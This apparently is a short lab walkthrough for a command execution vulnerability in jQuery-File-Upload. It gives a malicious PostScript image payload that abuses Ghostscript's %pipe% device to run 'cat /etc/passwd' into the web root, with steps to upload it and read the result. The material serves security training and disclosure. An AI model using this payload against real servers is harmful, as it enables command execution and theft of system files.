jQuery-File-Upload is the second most starred jQuery project on GitHub, after the jQuery framework itself. The project was recently reported to have a three-year-old arbitrary file upload vulnerability that was fixed in the release of v9.22.2, but another serious command execution vulnerability was found in the VulnSpy team’s review of the code, this vulnerability allows attackers to execute arbitrary system commands by uploading malicious picture files.


1. Click START TO HACK button in the upper right corner to create an online environment.

2. Open the target address on projects list

3. Upload the file vsplate.jpg with malicious codes


Execute cat /etc/passwd > /var/www/html/vsplate.txt

userdict /setpagedevice undef
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
mark /OutputFile (%pipe%cat /etc/passwd > /var/www/html/vsplate.txt) currentdevice putdeviceprops

4. Visit http://target.vsplate.me/vsplate.txt